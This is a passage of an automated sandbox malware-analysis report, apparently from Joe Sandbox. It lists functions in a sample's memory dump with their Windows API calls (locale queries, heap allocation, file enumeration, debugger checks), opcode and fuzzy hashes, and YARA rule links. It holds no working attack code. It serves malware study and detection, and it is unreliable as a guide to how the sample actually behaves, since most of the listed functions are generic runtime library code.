Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: b52e2684ac0e283bd877b36c6823ca39183f6ca29c6b8373dd65ee2deb198e34
Instruction ID: 730a1c066b0a16d259a7ed42df459f4980e2938bce36d7745b647a94b0afeb4d
Opcode Fuzzy Hash: b52e2684ac0e283bd877b36c6823ca39183f6ca29c6b8373dd65ee2deb198e34
Instruction Fuzzy Hash: B601F43660C2565ACB179B78E9E52ACBB60FF86334F24D26FE102D95D1CB125A51C310

Function 0033E531 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,003331E1,0033186A,?,003360C1,0033186C,0033186A,?,?,?,00333181,003331E1,0033186E,0033186A,0033186A,0033186A), ref: 0033E563

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9f0fcadb5ef6c118dbecdda61951eefe726e4dd4cc31addf8ca5fb0830e239a7
Instruction ID: 0ff7a067724b89832ced5ed84f6f1fe77baa7627dac0e4506f02f551d13a79d2
Opcode Fuzzy Hash: 9f0fcadb5ef6c118dbecdda61951eefe726e4dd4cc31addf8ca5fb0830e239a7
Instruction Fuzzy Hash: DEE0223190122457FB336B66AC81B5A3A4C9F037B8F160120FC56EB4E1FB60CD0082B0

Non-executed Functions

Function 00343178 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00342B49,00000002,00000000,?,?,?,00342B49,?,00000000), ref: 00343211
GetLocaleInfoW.KERNEL32(?,20001004,00342B49,00000002,00000000,?,?,?,00342B49,?,00000000), ref: 0034323A
GetACP.KERNEL32(?,?,00342B49,?,00000000), ref: 0034324F

Strings

OCP, xrefs: 003431CC
ACP, xrefs: 00343196

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: c5034cfbdf489bf156c41301e0609095c73704408f639f8ef9b79c4acc5cef57
Instruction ID: 8aeb6df0ff504761a8a55181b15ebaa4dc90fc8ebeef7be550dec4e94857a289
Opcode Fuzzy Hash: c5034cfbdf489bf156c41301e0609095c73704408f639f8ef9b79c4acc5cef57
Instruction Fuzzy Hash: 8421AC32600105AADB379F64D805BAB73EAAF94B50B278824E90ADF120E772FF40D750

Function 00342A13 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00342B1B
IsValidCodePage.KERNEL32(00000000), ref: 00342B59
IsValidLocale.KERNEL32(?,00000001), ref: 00342B6C
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00342BB4
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00342BCF

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 0ba8731b10de7eea0d1bae6cf8951a36560ff47ce7be8fb64aa9ac9f06f0eff5
Instruction ID: c094710c0944b4c8c9d8e9a3f819a19409c888755eeb19e69a3870340a802e1a
Opcode Fuzzy Hash: 0ba8731b10de7eea0d1bae6cf8951a36560ff47ce7be8fb64aa9ac9f06f0eff5
Instruction Fuzzy Hash: DD514F71A00215AEDB22DFA4CC85AAF77F8FF14701F964469B901FF191DB70AA44CB61

Function 0034375A Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0034384A

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 95e708f98e352d988744a148c4b39d184aac210fcaafb13d5bf5575842058d65
Instruction ID: 7a9d823f42a28687bba70c4d099d0ce5dfc8ccaced0def9fc1d1400c876ef318
Opcode Fuzzy Hash: 95e708f98e352d988744a148c4b39d184aac210fcaafb13d5bf5575842058d65
Instruction Fuzzy Hash: 3971D1B19051696EDF22AF68CC8DBBABBF8EF05300F1441DAE0499B251DB356F858F10

Function 00335020 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0033502C
IsDebuggerPresent.KERNEL32 ref: 003350F8
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00335111
UnhandledExceptionFilter.KERNEL32(?), ref: 0033511B

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 17daa074bf46731d6ac28134a1bb9ba83d2408f6309d5166b0de5edc03350b11
Instruction ID: 636bb8f79a09921e7fe6b2adf43999b880af472314639bca5086842764a831e9
Opcode Fuzzy Hash: 17daa074bf46731d6ac28134a1bb9ba83d2408f6309d5166b0de5edc03350b11
Instruction Fuzzy Hash: 54310AB5D053199BDF22DF64DD897CDBBB8AF08300F1041AAE40DAB250EB719B858F45

Function 00342CFF Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00342D53
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00342D9D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00342E63

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 3ddee377dbccfdc8df2541a109a689d9fa6cfa5d494d3bf496cb49dd515cc392
Instruction ID: 9354c49fd906d152d3c2f268c7dc0283f9f914d56db6ac1265f304ac596fbf86
Opcode Fuzzy Hash: 3ddee377dbccfdc8df2541a109a689d9fa6cfa5d494d3bf496cb49dd515cc392
Instruction Fuzzy Hash: 4D618D71910217DFDB2A9F28CC82BABB7E8EF04301F91416AFD05EA585E774E994CB50

Function 0033B4B9 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,003331E1), ref: 0033B5B1
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,003331E1), ref: 0033B5BB
UnhandledExceptionFilter.KERNEL32(00331542,?,?,?,?,?,003331E1), ref: 0033B5C8

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b4605e6f70e4ebe2b39f12964196a6d070cb91f1d50c90a56273934a184c29b0
Instruction ID: aa6a68eff32f52e7ded1a1f947b72fc5220388da7f541280c9373e215d96116b
Opcode Fuzzy Hash: b4605e6f70e4ebe2b39f12964196a6d070cb91f1d50c90a56273934a184c29b0
Instruction Fuzzy Hash: 2331937490122D9BCB22DF68D98979DBBB8BF08750F5041DAE41CA6261E7709F858F44

Function 003436A9 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0033F807: HeapAlloc.KERNEL32(00000008,?,003331E1,?,0033E921,00000001,00000364,003331E1,00000003,000000FF,?,003360C1,0033186C,0033186A,?,?), ref: 0033F848

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0034384A
FindNextFileW.KERNEL32(00000000,?), ref: 0034393E
FindClose.KERNEL32(00000000), ref: 0034397D
FindClose.KERNEL32(00000000), ref: 003439B0

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: ca1af8210561e8f1e3cc85d515a39a422457ca48b3ee3b5e99ad6f5fcffda7d1
Instruction ID: 2dd02a194d8f4a9cfc8ed964bd6d6bdd0080387fa336c29040894a9ce6ec1f59
Opcode Fuzzy Hash: ca1af8210561e8f1e3cc85d515a39a422457ca48b3ee3b5e99ad6f5fcffda7d1
Instruction Fuzzy Hash: FB519BB5900119AFDF16AF788CC5EBEBBEDDF85304F254199F4589F241EA30AE418B20

Function 00342FB1 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00343005

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 3eb3ae6ed9320baee1145f4a3e88321dd03ce9badd5d31e42ec3c1d80848eca0
Instruction ID: 079598eef13c208ee086a3387bf2bd5b8656ef5fc2bf5d80eaebfbf29a5e3a68
Opcode Fuzzy Hash: 3eb3ae6ed9320baee1145f4a3e88321dd03ce9badd5d31e42ec3c1d80848eca0
Instruction Fuzzy Hash: 6B218371541206ABDF2A9A19DC82ABB77ECEF44711F100169FD02DB195EB74FE408A51

Function 003430D1 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00343125

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 1c3ecdda5b9702afb5bb1cf51e072027251594345588a3c62707e6ab0442f578
Instruction ID: 35a6dbb36f53fa5d28d2f2de621f9779f125ed67824d29c143eec9f5fe08b49c
Opcode Fuzzy Hash: 1c3ecdda5b9702afb5bb1cf51e072027251594345588a3c62707e6ab0442f578
Instruction Fuzzy Hash: 4511E572611216ABDB16AB28DC82ABA77ECEF05311F10017AF505DF280EB74FE009790

Function 00342C64 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829

EnumSystemLocalesW.KERNEL32(00342CFF,00000001,00000000,?,-00000050,?,00342AEF,00000000,-00000002,00000000,?,00000055,?), ref: 00342CD6

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a7b2fba3c88b9dc00e3a42ddc38cbee634ba161b5f7245874f273261f6e90917
Instruction ID: 07896dbc112a87034fb89fe5512e58ab158815eb769493e2b6d6688aa824a014
Opcode Fuzzy Hash: a7b2fba3c88b9dc00e3a42ddc38cbee634ba161b5f7245874f273261f6e90917
Instruction Fuzzy Hash: 3F11023A2007019FDB19AF39C8D16BABB92FF80358B55442CE9469BA40D371B942CB40

Function 0034327E Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00342F1B,00000000,00000000,?), ref: 003432AA

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: d92e841c567f0c186e44a8e455cd491cd5f4870fa9236fd9e4ec8b7d3dee7dff
Instruction ID: 6074c448e8aa5620836904891dccd302f74dc57e859fc2193485a1358db33742
Opcode Fuzzy Hash: d92e841c567f0c186e44a8e455cd491cd5f4870fa9236fd9e4ec8b7d3dee7dff
Instruction Fuzzy Hash: 92014932601112BFDB1A5B24CC07BBA3798EB40754F160829EC12AB180EAB1FF41C694

Function 00342F52 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829

EnumSystemLocalesW.KERNEL32(00342FB1,00000001,?,?,-00000050,?,00342AB7,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00342F9C

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 958bec20e0edaf7312e75f222e4d49f1962e913784d80c6be1b27d37aa9d5376
Instruction ID: eaf37005f014a16826ff39d29f7260e7e6ea146689a0df40a6345ceea55f66b1
Opcode Fuzzy Hash: 958bec20e0edaf7312e75f222e4d49f1962e913784d80c6be1b27d37aa9d5376
Instruction Fuzzy Hash: 58F0F6362003045FDB165F39D881A7B7BE5EF80768F86842CF9455F690D7B1BC42C650

Function 0033F717 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0033B750: EnterCriticalSection.KERNEL32(-00023A67,?,00338F5A,00000000,003544D8,0000000C,00338F13,?,?,0033F83A,?,?,0033E921,00000001,00000364,003331E1), ref: 0033B75F

EnumSystemLocalesW.KERNEL32(0033F70A,00000001,00354928,0000000C,0033F118,-00000050), ref: 0033F74F

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 9fb30f76d2e90f41c263a504470102795b30cefd37d70c301c754e3cee568117
Instruction ID: b33a1b41aec5c80d997f3e3287afa14d9593cf41299a6d1a5daa1dfa18b5be7c
Opcode Fuzzy Hash: 9fb30f76d2e90f41c263a504470102795b30cefd37d70c301c754e3cee568117
Instruction Fuzzy Hash: 6FF0E776A04304DFD702DFA8E882B9D77B4EB48766F10416AF515DB2A0CB7959458F80

Function 00343086 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829

EnumSystemLocalesW.KERNEL32(003430D1,00000001,?,?,?,00342B11,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 003430BD

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 6a4625ffe0868079c268eb8d2ec575f20adfcd32afa057862175ab62ba7ff462
Instruction ID: 6b69b77c643aa38aef550465c6716389e3fcbecebd43c648141a47deb3c3f79a
